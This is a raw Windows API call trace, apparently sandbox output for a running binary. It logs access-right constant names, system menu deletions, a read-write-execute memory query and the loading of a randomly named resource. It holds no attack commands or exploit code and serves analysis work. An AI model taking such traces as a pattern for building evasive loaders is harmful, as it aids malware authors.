[0170.007] SysReAllocStringLen (in: pbstr=0x291e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e3b0*="STANDARD_RIGHTS_READ") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e390*="DELETE") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e380*="READ_CONTROL") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e370*="WRITE_OWNER") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e360*="WRITE_DAC") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x291e350*="PERM_FILE_CREATE") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x291e340*="PERM_FILE_WRITE") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x291e330*="PERM_FILE_READ") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e310*="STANDARD_RIGHTS_WRITE") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e300*="STANDARD_RIGHTS_READ") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e2e0*="DELETE") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e2d0*="READ_CONTROL") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e2c0*="WRITE_OWNER") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e2b0*="WRITE_DAC") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x291e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x291e290*="PRINTER_ACCESS_USE") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x291e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x291e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x291e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x291e250*="PRINTER_ALL_ACCESS") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x291e240*="PRINTER_EXECUTE") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x291e230*="PRINTER_WRITE") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x291e220*="PRINTER_READ") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x291e210*="PRINTER_ALL_ACCESS") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e200*="DELETE") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e1f0*="READ_CONTROL") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e1e0*="WRITE_OWNER") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e1d0*="WRITE_DAC") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x291e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x291e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0170.007] SysReAllocStringLen (in: pbstr=0x291e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x291e1a0*="SC_MANAGER_LOCK") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x291e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x291e180*="SC_MANAGER_CONNECT") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x291e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x291e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e140*="STANDARD_RIGHTS_WRITE") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e130*="STANDARD_RIGHTS_READ") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e120*="STANDARD_RIGHTS_ALL") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e110*="DELETE") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e100*="READ_CONTROL") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e0f0*="WRITE_OWNER") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e0e0*="WRITE_DAC") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x291e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x291e0c0*="SERVICE_STOP") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x291e0b0*="SERVICE_START") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x291e0a0*="SERVICE_QUERY_STATUS") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x291e090*="SERVICE_QUERY_CONFIG") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x291e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x291e070*="SERVICE_INTERROGATE") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x291e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x291e050*="SERVICE_CHANGE_CONFIG") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x291e040*="SERVICE_ALL_ACCESS") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e020*="STANDARD_RIGHTS_WRITE") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e010*="STANDARD_RIGHTS_READ") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e000*="STANDARD_RIGHTS_ALL") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291dff0*="DELETE") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291dfe0*="READ_CONTROL") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291dfd0*="WRITE_OWNER") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291dfc0*="WRITE_DAC") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x291dfb0*="KEY_SET_VALUE") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x291dfa0*="KEY_CREATE_LINK") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x291df90*="KEY_CREATE_SUB_KEY") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x291df80*="KEY_NOTIFY") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x291df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x291df60*="KEY_QUERY_VALUE") returned 1
[0170.008] SysReAllocStringLen (in: pbstr=0x291df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291df40*="STANDARD_RIGHTS_WRITE") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x291df30*="STANDARD_RIGHTS_READ 2") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x291df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291df10*="DELETE") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291df00*="READ_CONTROL") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291def0*="WRITE_OWNER") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291dee0*="WRITE_DAC") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x291ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x291dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x291deb0*="DESKTOP_JOURNALRECORD") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x291dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x291de90*="DESKTOP_HOOKCONTROL") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x291de80*="DESKTOP_CREATEWINDOW") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x291de70*="DESKTOP_CREATEMENU") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x291de60*="DESKTOP_READOBJECTS") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x291de50*="DESKTOP_ENUMERATE") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291de30*="STANDARD_RIGHTS_WRITE") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291de20*="STANDARD_RIGHTS_READ") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291de10*="STANDARD_RIGHTS_ALL") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291de00*="DELETE") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291ddf0*="READ_CONTROL") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291dde0*="WRITE_OWNER") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291ddd0*="WRITE_DAC") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x291ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x291ddb0*="WINSTA_READSCREEN") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x291dda0*="WINSTA_READATTRIBUTES") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x291dd90*="WINSTA_EXITWINDOWS") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x291dd80*="WINSTA_ENUMERATE") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x291dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x291dd60*="WINSTA_CREATEDESKTOP") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x291dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x291dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0170.009] SysReAllocStringLen (in: pbstr=0x291dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291dd10*="STANDARD_RIGHTS_READ") returned 1
[0170.010] SysReAllocStringLen (in: pbstr=0x291dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x291dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0170.010] SysReAllocStringLen (in: pbstr=0x291dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291dcf0*="READ_CONTROL") returned 1
[0170.010] SysReAllocStringLen (in: pbstr=0x291dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x291dce0*="SI_ACCESS_SPECIFIC") returned 1
[0170.010] SysReAllocStringLen (in: pbstr=0x291dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291dcd0*="WRITE_DAC") returned 1
[0170.010] SysReAllocStringLen (in: pbstr=0x291dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x291dcc0*="FILE_DELETE") returned 1
[0170.010] SysReAllocStringLen (in: pbstr=0x291dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x291dcb0*="FILE_DELETE_CHILD") returned 1
[0170.011] SetClassLongA (hWnd=0xb01de, nIndex=-14, dwNewLong=65575) returned 0x0
[0170.011] GetSystemMenu (hWnd=0xb01de, bRevert=0) returned 0xb01e7
[0170.011] DeleteMenu (hMenu=0xb01e7, uPosition=0xf030, uFlags=0x0) returned 1
[0170.011] DeleteMenu (hMenu=0xb01e7, uPosition=0xf000, uFlags=0x0) returned 1
[0170.011] DeleteMenu (hMenu=0xb01e7, uPosition=0xf010, uFlags=0x0) returned 1
[0170.011] GetCurrentThreadId () returned 0x84c
[0170.012] ResetEvent (hEvent=0xa0) returned 1
[0170.012] GetCurrentThreadId () returned 0x84c
[0170.012] GetCurrentThreadId () returned 0x84c
[0170.012] GetCurrentThreadId () returned 0x84c
[0170.012] ResetEvent (hEvent=0xa0) returned 1
[0170.012] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1af6d4, fWinIni=0x0 | out: pvParam=0x1af6d4) returned 1
[0170.012] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1af6d4, fWinIni=0x0 | out: pvParam=0x1af6d4) returned 1
[0170.012] GetSystemMetrics (nIndex=49) returned 16
[0170.012] GetSystemMetrics (nIndex=50) returned 16
[0170.012] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1af71c, fWinIni=0x0 | out: pvParam=0x1af71c) returned 1
[0170.012] IsWindowVisible (hWnd=0xb01de) returned 0
[0170.012] GetCurrentThreadId () returned 0x84c
[0170.013] VirtualQuery (in: lpAddress=0x28f1668, lpBuffer=0x1af5ec, dwLength=0x1c | out: lpBuffer=0x1af5ec*(BaseAddress=0x28f1000, AllocationBase=0x2830000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0170.013] FindResourceA (hModule=0x2830000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2938990
[0170.013] FindResourceA (hModule=0x2830000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2938990
[0170.013] LoadResource (hModule=0x2830000, hResInfo=0x2938990) returned 0x293f044
[0170.013] SizeofResource (hModule=0x2830000, hResInfo=0x2938990) returned 0xca5
[0170.013] LockResource (hResData=0x293f044) returned 0x293f044
[0170.013] GetCurrentThreadId () returned 0x84c
[0170.013] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1af3a0, fWinIni=0x0 | out: pvParam=0x1af3a0) returned 1
[0170.013] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1af3a0, fWinIni=0x0 | out: pvParam=0x1af3a0) returned 1
[0170.013] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1af3a0, fWinIni=0x0 | out: pvParam=0x1af3a0) returned 1
[0170.013] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x1af3a0, fWinIni=0x0 | out: pvParam=0x1af3a0) returned 1
[0170.014] GetDC (hWnd=0x0) returned 0x1501085f
[0170.014] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af384 | out: lptm=0x1af384) returned 1
[0170.014] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0170.015] CreateFontIndirectA (lplf=0x1af33c) returned 0x290a084c
[0170.015] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.016] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3bc | out: lptm=0x1af3bc) returned 1
[0170.016] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.016] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.016] GetSystemMetrics (nIndex=6) returned 1
[0170.016] VirtualAlloc (lpAddress=0x2954000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2954000
[0170.016] GetDC (hWnd=0x0) returned 0x1501085f
[0170.016] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af384 | out: lptm=0x1af384) returned 1
[0170.016] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.016] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3bc | out: lptm=0x1af3bc) returned 1
[0170.016] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.016] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.016] GetSystemMetrics (nIndex=6) returned 1
[0170.017] GetDC (hWnd=0x0) returned 0x1501085f
[0170.017] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af384 | out: lptm=0x1af384) returned 1
[0170.017] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.017] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3bc | out: lptm=0x1af3bc) returned 1
[0170.017] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.017] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.017] GetSystemMetrics (nIndex=6) returned 1
[0170.017] GetDC (hWnd=0x0) returned 0x1501085f
[0170.017] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af384 | out: lptm=0x1af384) returned 1
[0170.017] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.017] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3bc | out: lptm=0x1af3bc) returned 1
[0170.017] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.017] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.017] GetSystemMetrics (nIndex=6) returned 1
[0170.018] GetDC (hWnd=0x0) returned 0x1501085f
[0170.018] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af398 | out: lptm=0x1af398) returned 1
[0170.018] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.018] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3d0 | out: lptm=0x1af3d0) returned 1
[0170.018] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.018] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.018] GetSystemMetrics (nIndex=6) returned 1
[0170.018] GetDC (hWnd=0x0) returned 0x1501085f
[0170.018] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af09c | out: lptm=0x1af09c) returned 1
[0170.018] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.018] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af0d4 | out: lptm=0x1af0d4) returned 1
[0170.018] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.018] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.018] GetSystemMetrics (nIndex=6) returned 1
[0170.019] GetDC (hWnd=0x0) returned 0x1501085f
[0170.019] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af398 | out: lptm=0x1af398) returned 1
[0170.019] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.019] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3d0 | out: lptm=0x1af3d0) returned 1
[0170.019] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.019] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.019] GetSystemMetrics (nIndex=6) returned 1
[0170.019] GetDC (hWnd=0x0) returned 0x1501085f
[0170.019] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af09c | out: lptm=0x1af09c) returned 1
[0170.019] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.019] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af0d4 | out: lptm=0x1af0d4) returned 1
[0170.019] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.019] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.019] GetSystemMetrics (nIndex=6) returned 1
[0170.020] GetDC (hWnd=0x0) returned 0x1501085f
[0170.020] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af398 | out: lptm=0x1af398) returned 1
[0170.020] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.020] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3d0 | out: lptm=0x1af3d0) returned 1
[0170.020] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.020] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
